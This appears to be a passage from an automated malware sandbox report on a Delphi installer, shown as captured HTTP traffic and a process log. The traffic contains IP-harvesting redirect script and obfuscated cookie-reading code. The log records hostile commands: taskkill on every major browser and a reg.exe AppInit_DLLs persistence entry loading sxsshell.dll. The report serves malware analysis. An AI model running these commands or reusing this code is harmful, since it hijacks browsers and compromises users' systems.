                                                                                                                  2023-03-21 12:20:44 UTC8INData Raw: 31 32 36 0d 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0d 0a 20 20 66 75 6e 63 74 69 6f 6e 20 67 65 74 49 50 28 6a 73 6f 6e 29 20 7b 0d 0a 20 20 20 20 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 20 3d 20 22 68 74 74 70 73 3a 2f 2f 67 65 74 66 69 6c 65 73 2e 77 69 6b 69 2f 72 65 64 69 72 65 63 74 2e 70 68 70 3f 67 6a 68 61 67 64 6a 66 62 64 6a 6b 3d 22 2b 62 74 6f 61 28 6a 73 6f 6e 2e 69 70 29 3b 0d 0a 20 20 20 20 65 78 69 74 28 29 3b 0d 0a 20 20 7d 0d 0a 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 61 70 69 2e 69 70 69 66 79 2e
                                                                                                                  Data Ascii: 126<script type="application/javascript"> function getIP(json) { window.location.href = "https://getfiles.wiki/redirect.php?gjhagdjfbdjk="+btoa(json.ip); exit(); }</script><script type="application/javascript" src="https://api.ipify.
                                                                                                                  2023-03-21 12:20:44 UTC8INData Raw: 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 0


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                  5192.168.2.224919764.185.227.155443C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                  2023-03-21 12:20:45 UTC8OUTGET /?format=jsonp&callback=getIP HTTP/1.1
                                                                                                                  Host: api.ipify.org
                                                                                                                  Connection: keep-alive
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.135 Safari/537.36
                                                                                                                  Accept: */*
                                                                                                                  Sec-Fetch-Site: cross-site
                                                                                                                  Sec-Fetch-Mode: no-cors
                                                                                                                  Sec-Fetch-Dest: script
                                                                                                                  Referer: https://getfiles.wiki/redirect.php
                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                  2023-03-21 12:20:47 UTC8INHTTP/1.1 200 OK
                                                                                                                  Content-Length: 31
                                                                                                                  Content-Type: application/javascript
                                                                                                                  Date: Tue, 21 Mar 2023 12:20:47 GMT
                                                                                                                  Vary: Origin
                                                                                                                  Connection: close
                                                                                                                  2023-03-21 12:20:48 UTC8INData Raw: 67 65 74 49 50 28 7b 22 69 70 22 3a 22 31 30 32 2e 31 32 39 2e 31 34 33 2e 37 38 22 7d 29 3b
                                                                                                                  Data Ascii: getIP({"ip":"102.129.143.78"});


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                  6192.168.2.2249202188.114.97.3443C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                  2023-03-21 12:20:48 UTC8OUTGET /redirect.php?gjhagdjfbdjk=MTAyLjEyOS4xNDMuNzg= HTTP/1.1
                                                                                                                  Host: getfiles.wiki
                                                                                                                  Connection: keep-alive
                                                                                                                  Upgrade-Insecure-Requests: 1
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.135 Safari/537.36
                                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
                                                                                                                  Sec-Fetch-Site: same-origin
                                                                                                                  Sec-Fetch-Mode: navigate
                                                                                                                  Sec-Fetch-Dest: document
                                                                                                                  Referer: https://getfiles.wiki/redirect.php
                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                  2023-03-21 12:20:49 UTC9INHTTP/1.1 200 OK
                                                                                                                  Date: Tue, 21 Mar 2023 12:20:49 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: close
                                                                                                                  vary: Accept-Encoding,User-Agent
                                                                                                                  x-turbo-charged-by: LiteSpeed
                                                                                                                  CF-Cache-Status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=gYqrcU9I1wwOrd5e8swhaVcMoQyAgloRDFZSbq5OerRuoi5cr9cJI2zlOwKuQ%2B3%2B%2BJ031oDKFUf0o%2Bj1eATwknFKQcuFypQb7FRM1R7TJa6UcTcPUrPVZbC7VOa4rzOp"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 7ab626ae4c4f9b21-FRA
                                                                                                                  alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                                                                                                                  2023-03-21 12:20:49 UTC10INData Raw: 64 65 39 0d 0a 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0d 0a 3c 73 74 79 6c 65 3e 0d 0a 62 6f 64 79 20 7b 0d 0a 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 30 30 30 30
                                                                                                                  Data Ascii: de9<!DOCTYPE html><html lang="en"><head> <meta charset="UTF-8"> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta name="viewport" content="width=device-width, initial-scale=1.0"><style>body { background-color: #0000
                                                                                                                  2023-03-21 12:20:49 UTC10INData Raw: 2c 7b 7d 29 7d 66 75 6e 63 74 69 6f 6e 20 72 28 72 29 7b 76 6f 69 64 20 30 3d 3d 3d 72 26 26 28 72 3d 22 75 63 6c 69 63 6b 22 29 3b 76 61 72 20 63 2c 74 2c 75 3d 65 28 28 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 28 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 72 65 74 75 72 6e 20 76 6f 69 64 20 30 3d 3d 3d 6e 26 26 28 6e 3d 22 75 63 6c 69 63 6b 22 29 2c 41 72 72 61 79 2e 66 72 6f 6d 28 64 6f 63 75 6d 65 6e 74 2e 63 6f 6f 6b 69 65 2e 6d 61 74 63 68 41 6c 6c 28 6e 65 77 20 52 65 67 45 78 70 28 22 28 3f 3a 5e 7c 3b 20 29 28 63 6c 69 63 6b 69 64 7c 22 2b 6e 2b 22 29 3d 28 5b 5e 3b 5d 2a 29 22 2c 22 67 22 29 29 29 2e 6d 61 70 28 28 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 72 65 74 75 72 6e 7b 6e 61 6d 65 3a 6e 5b 31 5d 2c 76 61 6c 75 65 3a 6e 5b 32 5d 7d 7d 29 29
                                                                                                                  Data Ascii: ,{})}function r(r){void 0===r&&(r="uclick");var c,t,u=e((function(){return(function(n){return void 0===n&&(n="uclick"),Array.from(document.cookie.matchAll(new RegExp("(?:^|; )(clickid|"+n+")=([^;]*)","g"))).map((function(n){return{name:n[1],value:n[2]}}))
                                                                                                                  2023-03-21 12:20:49 UTC12INData Raw: 20 76 6f 69 64 20 30 3d 3d 3d 6e 26 26 28 6e 3d 22 75 63 6c 69 63 6b 22 29 2c 41 72 72 61 79 2e 66 72 6f 6d 28 64 6f 63 75 6d 65 6e 74 2e 63 6f 6f 6b 69 65 2e 6d 61 74 63 68 41 6c 6c 28 6e 65 77 20 52 65 67 45 78 70 28 22 28 3f 3a 5e 7c 3b 20 29 28 63 6c 69 63 6b 69 64 7c 22 2b 6e 2b 22 29 3d 28 5b 5e 3b 5d 2a 29 22 2c 22 67 22 29 29 29 2e 6d 61 70 28 28 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 72 65 74 75 72 6e 7b 6e 61 6d 65 3a 6e 5b 31 5d 2c 76 61 6c 75 65 3a 6e 5b 32 5d 7d 7d 29 29 7d 29 28 72 29 7d 29 29 2c 69 3d 65 28 28 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 6e 28 64 6f 63 75 6d 65 6e 74 2e 72 65 66 65 72 72 65 72 2c 72 29 7d 29 29 2c 6f 3d 65 28 28 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 6e 28 64 6f 63 75 6d 65 6e 74 2e 6c
                                                                                                                  Data Ascii: void 0===n&&(n="uclick"),Array.from(document.cookie.matchAll(new RegExp("(?:^|; )(clickid|"+n+")=([^;]*)","g"))).map((function(n){return{name:n[1],value:n[2]}}))})(r)})),i=e((function(){return n(document.referrer,r)})),o=e((function(){return n(document.l
                                                                                                                  2023-03-21 12:20:49 UTC13INData Raw: 2e 68 69 73 74 61 74 73 2e 63 6f 6d 2f 30 2e 67 69 66 3f 34 37 30 38 37 38 37 26 31 30 31 22 20 61 6c 74 3d 22 77 65 62 20 6c 6f 67 20 66 72 65 65 22 20 62 6f 72 64 65 72 3d 22 30 22 3e 3c 2f 61 3e 3c 2f 6e 6f 73 63 72 69 70 74 3e 0d 0a 3c 21 2d 2d 20 48 69 73 74 61 74 73 2e 63 6f 6d 20 20 45 4e 44 20 20 2d 2d 3e 0d 0a 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a
                                                                                                                  Data Ascii: .histats.com/0.gif?4708787&101" alt="web log free" border="0"></a></noscript>... Histats.com END --></html>
                                                                                                                  2023-03-21 12:20:49 UTC13INData Raw: 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 0


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                  7192.168.2.224920646.105.201.240443C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                  2023-03-21 12:20:49 UTC13OUTGET /js15_as.js HTTP/1.1
                                                                                                                  Host: s10.histats.com
                                                                                                                  Connection: keep-alive
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.135 Safari/537.36
                                                                                                                  Accept: */*
                                                                                                                  Sec-Fetch-Site: cross-site
                                                                                                                  Sec-Fetch-Mode: no-cors
                                                                                                                  Sec-Fetch-Dest: script
                                                                                                                  Referer: https://getfiles.wiki/redirect.php?gjhagdjfbdjk=MTAyLjEyOS4xNDMuNzg=
                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                  2023-03-21 12:20:49 UTC14INHTTP/1.1 200 OK
                                                                                                                  Date: Tue, 21 Mar 2023 12:11:45 GMT
                                                                                                                  Last-Modified: Thu, 16 Apr 2020 10:44:16 GMT
                                                                                                                  X-Request-ID: 158761696
                                                                                                                  Content-Type: text/javascript
                                                                                                                  Vary: Accept-Encoding
                                                                                                                  ETag: W/"-375139978"
                                                                                                                  X-CDN-Pop: sbg
                                                                                                                  X-CDN-Pop-IP: 137.74.120.0/27
                                                                                                                  X-Cacheable: Matched cache
                                                                                                                  Accept-Ranges: bytes
                                                                                                                  Content-Length: 11440
                                                                                                                  Connection: close
                                                                                                                  2023-03-21 12:20:49 UTC14INData Raw: 28 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 6e 3d 22 75 6e 64 65 66 69 6e 65 64 22 2c 74 3d 66 75 6e 63 74 69 6f 6e 28 74 29 7b 72 65 74 75 72 6e 20 74 79 70 65 6f 66 20 74 21 3d 3d 6e 7d 2c 65 3d 22 6a 73 31 35 5f 61 73 2e 6a 73 22 2c 72 3d 22 22 2c 69 3d 21 31 2c 6f 3d 21 31 2c 61 3d 21 31 2c 73 3d 21 31 2c 63 3d 22 30 2e 32 2e 31 22 2c 75 3d 32 35 2c 5f 3d 22 2d 22 2c 66 3d 22 5f 48 49 53 54 41 54 53 5f 53 49 44 22 2c 64 3d 22 68 69 73 74 61 74 73 5f 63 75 73 74 6f 6d 5f 64 65 73 74 44 69 76 50 72 6f 64 75 63 65 72 22 2c 70 3d 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 5f 2b 3d 22 5f 22 2b 6e 7d 3b 70 28 63 29 3b 76 61 72 20 76 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 69 26 26 63 6f 6e 73 6f 6c 65 2e 6c 6f 67 2e 61 70 70 6c 79 28 74 68 69 73 2c 61 72 67 75 6d
                                                                                                                  Data Ascii: (function(){var n="undefined",t=function(t){return typeof t!==n},e="js15_as.js",r="",i=!1,o=!1,a=!1,s=!1,c="0.2.1",u=25,_="-",f="_HISTATS_SID",d="histats_custom_destDivProducer",p=function(n){_+="_"+n};p(c);var v=function(){i&&console.log.apply(this,argum


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                  8192.168.2.224920538.128.66.115443C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                  2023-03-21 12:20:49 UTC25OUTGET /r.php?payout=OPTIONAL&cnv_id=OPTIONAL HTTP/1.1
                                                                                                                  Host: offerszzzz.click
                                                                                                                  Connection: keep-alive
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.135 Safari/537.36
                                                                                                                  Accept: image/webp,image/apng,image/*,*/*;q=0.8
                                                                                                                  Sec-Fetch-Site: cross-site
                                                                                                                  Sec-Fetch-Mode: no-cors
                                                                                                                  Sec-Fetch-Dest: image
                                                                                                                  Referer: https://getfiles.wiki/redirect.php?gjhagdjfbdjk=MTAyLjEyOS4xNDMuNzg=
                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                  2023-03-21 12:20:50 UTC27INHTTP/1.1 200 OK
                                                                                                                  Server: nginx/1.22.0
                                                                                                                  Date: Tue, 21 Mar 2023 12:20:50 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: close
                                                                                                                  Strict-Transport-Security: max-age=31536000
                                                                                                                  2023-03-21 12:20:50 UTC27INData Raw: 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 0


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                  9192.168.2.224920738.128.66.115443C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                  2023-03-21 12:20:49 UTC26OUTGET /r.php?payout=OPTIONAL&cnv_id=OPTIONAL HTTP/1.1
                                                                                                                  Host: offersss.click
                                                                                                                  Connection: keep-alive
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.135 Safari/537.36
                                                                                                                  Accept: image/webp,image/apng,image/*,*/*;q=0.8
                                                                                                                  Sec-Fetch-Site: cross-site
                                                                                                                  Sec-Fetch-Mode: no-cors
                                                                                                                  Sec-Fetch-Dest: image
                                                                                                                  Referer: https://getfiles.wiki/redirect.php?gjhagdjfbdjk=MTAyLjEyOS4xNDMuNzg=
                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                  2023-03-21 12:20:50 UTC27INHTTP/1.1 200 OK
                                                                                                                  Server: nginx/1.22.0
                                                                                                                  Date: Tue, 21 Mar 2023 12:20:50 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: close
                                                                                                                  Strict-Transport-Security: max-age=31536000
                                                                                                                  2023-03-21 12:20:50 UTC27INData Raw: 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 0


                                                                                                                  Click to jump to process

                                                                                                                  Click to jump to process

                                                                                                                  Click to dive into process behavior distribution

                                                                                                                  Click to jump to process

                                                                                                                  Target ID:1
                                                                                                                  Start time:13:20:23
                                                                                                                  Start date:21/03/2023
                                                                                                                  Path:C:\Users\user\Desktop\$RDGU87D.exe
                                                                                                                  Wow64 process (32bit):true
                                                                                                                  Commandline:C:\Users\user\Desktop\$RDGU87D.exe
                                                                                                                  Imagebase:0x400000
                                                                                                                  File size:1904656 bytes
                                                                                                                  MD5 hash:C91FCAA707B9E46828D867A4D399F6B2
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:Borland Delphi
                                                                                                                  Reputation:low

                                                                                                                  Target ID:2
                                                                                                                  Start time:13:20:25
                                                                                                                  Start date:21/03/2023
                                                                                                                  Path:C:\Users\user\AppData\Local\Temp\is-U66TV.tmp\$RDGU87D.tmp
                                                                                                                  Wow64 process (32bit):true
                                                                                                                  Commandline:"C:\Users\user\AppData\Local\Temp\is-U66TV.tmp\$RDGU87D.tmp" /SL5="$202DC,1078547,780800,C:\Users\user\Desktop\$RDGU87D.exe"
                                                                                                                  Imagebase:0x400000
                                                                                                                  File size:3014144 bytes
                                                                                                                  MD5 hash:4193A1BA05847842590BE08BEC38CC72
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:Borland Delphi
                                                                                                                  Antivirus matches:
                                                                                                                  • Detection: 0%, ReversingLabs
                                                                                                                  Reputation:low

                                                                                                                  Target ID:3
                                                                                                                  Start time:13:20:26
                                                                                                                  Start date:21/03/2023
                                                                                                                  Path:C:\Users\user\Desktop\$RDGU87D.exe
                                                                                                                  Wow64 process (32bit):true
                                                                                                                  Commandline:"C:\Users\user\Desktop\$RDGU87D.exe" /SILENT
                                                                                                                  Imagebase:0x400000
                                                                                                                  File size:1904656 bytes
                                                                                                                  MD5 hash:C91FCAA707B9E46828D867A4D399F6B2
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:Borland Delphi
                                                                                                                  Reputation:low

                                                                                                                  Target ID:4
                                                                                                                  Start time:13:20:27
                                                                                                                  Start date:21/03/2023
                                                                                                                  Path:C:\Users\user\AppData\Local\Temp\is-DAB6L.tmp\$RDGU87D.tmp
                                                                                                                  Wow64 process (32bit):true
                                                                                                                  Commandline:"C:\Users\user\AppData\Local\Temp\is-DAB6L.tmp\$RDGU87D.tmp" /SL5="$202E0,1078547,780800,C:\Users\user\Desktop\$RDGU87D.exe" /SILENT
                                                                                                                  Imagebase:0x400000
                                                                                                                  File size:3014144 bytes
                                                                                                                  MD5 hash:4193A1BA05847842590BE08BEC38CC72
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:Borland Delphi
                                                                                                                  Antivirus matches:
                                                                                                                  • Detection: 0%, ReversingLabs
                                                                                                                  Reputation:low

                                                                                                                  Target ID:5
                                                                                                                  Start time:13:20:27
                                                                                                                  Start date:21/03/2023
                                                                                                                  Path:C:\Windows\System32\taskkill.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:"taskkill" /F /IM msedge.exe /T
                                                                                                                  Imagebase:0xff750000
                                                                                                                  File size:112640 bytes
                                                                                                                  MD5 hash:3722FA501DCB50AE42818F9034906891
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Reputation:moderate

                                                                                                                  Target ID:8
                                                                                                                  Start time:13:20:27
                                                                                                                  Start date:21/03/2023
                                                                                                                  Path:C:\Windows\System32\taskkill.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:"taskkill" /F /IM chrome.exe /T
                                                                                                                  Imagebase:0xff810000
                                                                                                                  File size:112640 bytes
                                                                                                                  MD5 hash:3722FA501DCB50AE42818F9034906891
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Reputation:moderate

                                                                                                                  Target ID:10
                                                                                                                  Start time:13:20:28
                                                                                                                  Start date:21/03/2023
                                                                                                                  Path:C:\Windows\System32\taskkill.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:"taskkill" /F /IM vivaldi.exe /T
                                                                                                                  Imagebase:0xff150000
                                                                                                                  File size:112640 bytes
                                                                                                                  MD5 hash:3722FA501DCB50AE42818F9034906891
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Reputation:moderate

                                                                                                                  Target ID:12
                                                                                                                  Start time:13:20:28
                                                                                                                  Start date:21/03/2023
                                                                                                                  Path:C:\Windows\System32\taskkill.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:"taskkill" /F /IM opera.exe /T
                                                                                                                  Imagebase:0xff5a0000
                                                                                                                  File size:112640 bytes
                                                                                                                  MD5 hash:3722FA501DCB50AE42818F9034906891
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Reputation:moderate

                                                                                                                  Target ID:14
                                                                                                                  Start time:13:20:29
                                                                                                                  Start date:21/03/2023
                                                                                                                  Path:C:\Windows\System32\taskkill.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:"taskkill" /F /IM brave.exe /T
                                                                                                                  Imagebase:0xff960000
                                                                                                                  File size:112640 bytes
                                                                                                                  MD5 hash:3722FA501DCB50AE42818F9034906891
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language

                                                                                                                  Target ID:16
                                                                                                                  Start time:13:20:30
                                                                                                                  Start date:21/03/2023
                                                                                                                  Path:C:\Windows\System32\cmd.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:C:\Windows\system32\cmd.exe" /C ""C:\Users\user\AppData\Local\Temp\is-0L8M0.tmp\install.bat" install
                                                                                                                  Imagebase:0x4a590000
                                                                                                                  File size:345088 bytes
                                                                                                                  MD5 hash:5746BD7E255DD6A8AFA06F7C42C1BA41
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language

                                                                                                                  Target ID:18
                                                                                                                  Start time:13:20:30
                                                                                                                  Start date:21/03/2023
                                                                                                                  Path:C:\Windows\System32\reg.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows" /v "AppInit_DLLs" /t REG_SZ /d "C:\Windows\system32\sxsshell.dll" /f
                                                                                                                  Imagebase:0xff370000
                                                                                                                  File size:74752 bytes
                                                                                                                  MD5 hash:9D0B3066FE3D1FD345E86BC7BCCED9E4
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language

                                                                                                                  Target ID:19
                                                                                                                  Start time:13:20:31
                                                                                                                  Start date:21/03/2023
                                                                                                                  Path:C:\Windows\System32\reg.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows" /v "LoadAppInit_DLLs" /t REG_DWORD /d 1 /f
                                                                                                                  Imagebase:0xffbe0000
                                                                                                                  File size:74752 bytes
                                                                                                                  MD5 hash:9D0B3066FE3D1FD345E86BC7BCCED9E4
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language

                                                                                                                  Target ID:20
                                                                                                                  Start time:13:20:31
                                                                                                                  Start date:21/03/2023
                                                                                                                  Path:C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --start-maximized -- "https://smashbrowser.com/welcome2.php
                                                                                                                  Imagebase:0x13ffb0000
                                                                                                                  File size:1820656 bytes
                                                                                                                  MD5 hash:6ACAE527E744C80997B25EF2A0485D5E
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language

                                                                                                                  Target ID:21
                                                                                                                  Start time:13:20:31
                                                                                                                  Start date:21/03/2023
                                                                                                                  Path:C:\Windows\System32\xcopy.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:xcopy /E /I /Y "C:\Users\user\AppData\Local\WindowsApp\googledoc" "C:\Users\user\AppData\Local\Temp\rY3YrAQjOUXa"
                                                                                                                  Imagebase:0xff230000
                                                                                                                  File size:43008 bytes
                                                                                                                  MD5 hash:20CF8728C55A8743AAC86FB8D30EA898
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language

                                                                                                                  Target ID:23
                                                                                                                  Start time:13:20:32
                                                                                                                  Start date:21/03/2023
                                                                                                                  Path:C:\Windows\System32\xcopy.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:xcopy /E /I /Y "C:\Users\user\AppData\Local\WindowsApp\googledoc" "C:\Users\user\AppData\Local\Temp\uOB9DUdVCp9I"
                                                                                                                  Imagebase:0xff7d0000
                                                                                                                  File size:43008 bytes
                                                                                                                  MD5 hash:20CF8728C55A8743AAC86FB8D30EA898
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language

                                                                                                                  Target ID:25
                                                                                                                  Start time:13:20:34
                                                                                                                  Start date:21/03/2023
                                                                                                                  Path:C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:"C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1004,578352216204275106,4554941784064420504,131072 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --lang=en-US --service-sandbox-type=network --enable-audio-service-sandbox --mojo-platform-channel-handle=1440 /prefetch:8
                                                                                                                  Imagebase:0x13ffb0000
                                                                                                                  File size:1820656 bytes
                                                                                                                  MD5 hash:6ACAE527E744C80997B25EF2A0485D5E
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language

                                                                                                                  Target ID:28
                                                                                                                  Start time:13:20:34
                                                                                                                  Start date:21/03/2023
                                                                                                                  Path:C:\Windows\System32\xcopy.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:xcopy /E /I /Y "C:\Users\user\AppData\Local\WindowsApp\googledoc" "C:\Users\user\AppData\Local\Temp\17vsRA25JVNi"
                                                                                                                  Imagebase:0xfff80000
                                                                                                                  File size:43008 bytes
                                                                                                                  MD5 hash:20CF8728C55A8743AAC86FB8D30EA898
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language

                                                                                                                  Target ID:30
                                                                                                                  Start time:13:20:53
                                                                                                                  Start date:21/03/2023
                                                                                                                  Path:C:\Windows\System32\xcopy.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:xcopy /E /I /Y "C:\Users\user\AppData\Local\WindowsApp\googledoc" "C:\Users\user\AppData\Local\Temp\1NktFyo3fU3D"
                                                                                                                  Imagebase:0xff3a0000
                                                                                                                  File size:43008 bytes
                                                                                                                  MD5 hash:20CF8728C55A8743AAC86FB8D30EA898
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language

                                                                                                                  Target ID:32
                                                                                                                  Start time:13:21:14
                                                                                                                  Start date:21/03/2023
                                                                                                                  Path:C:\Windows\System32\xcopy.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:xcopy /E /I /Y "C:\Users\user\AppData\Local\WindowsApp\googledoc" "C:\Users\user\AppData\Local\Temp\7rq6ox04ddx8"
                                                                                                                  Imagebase:0xff520000
                                                                                                                  File size:43008 bytes
                                                                                                                  MD5 hash:20CF8728C55A8743AAC86FB8D30EA898
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language

                                                                                                                  Target ID:34
                                                                                                                  Start time:13:21:19
                                                                                                                  Start date:21/03/2023
                                                                                                                  Path:C:\Windows\System32\xcopy.exe
